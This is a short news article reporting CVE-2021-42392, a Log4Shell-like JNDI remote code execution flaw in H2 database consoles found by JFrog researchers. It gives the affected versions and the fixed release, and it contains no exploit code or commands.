Researchers have discovered a security hole in H2 database consoles that might lead to remote code execution, similar to the Log4j “Log4Shell” vulnerability discovered last month.
The issue, tracked as CVE-2021-42392, is the ” first critical issue published since Log4Shell, on a component other than Log4j, that exploits the same root cause of the Log4Shell vulnerability, namely JNDI remote class loading,” JFrog researchers Andrey Polkovnychenko and Shachar Menashe said.
H2 is a Java-based open-source relational database management system that may be incorporated in applications or used in a client-server configuration. The H2 database engine is utilized by 6,807 artifacts, according to the Maven Repository.
JNDI (Java Name and Directory Interface) is a Java API that provides naming and directory capabilities for Java applications. The API can be used in conjunction with LDAP to locate a certain resource that a Java application may require.
In the case of Log4Shell, this feature enables runtime lookups to servers both inside and outside the network, which can be weaponized to allow unauthenticated remote code execution and the installation of malware on the server by crafting a malicious JNDI lookup as input to any Java application that logs it using vulnerable versions of the Log4j library.
“Attacker-controlled URLs that propagate into JNDI lookups, similar to the Log4Shell vulnerability discovered in early December, can allow unauthenticated remote code execution, giving attackers sole control over the operation of another person’s or organization’s systems,” Menashe, senior director of JFrog security research, explained.
Versions 1.1.100 through 2.0.204 of the H2 database are affected, and the problem was fixed in version 2.0.206, which was released on January 5, 2022.
“Many third-party frameworks, such as Spring Boot, Play Framework, and JHipster, employ the H2 database,” Menashe continued. “While this vulnerability isn’t as ubiquitous as Log4Shell, it can still have a significant impact on developers and production systems if it isn’t addressed.”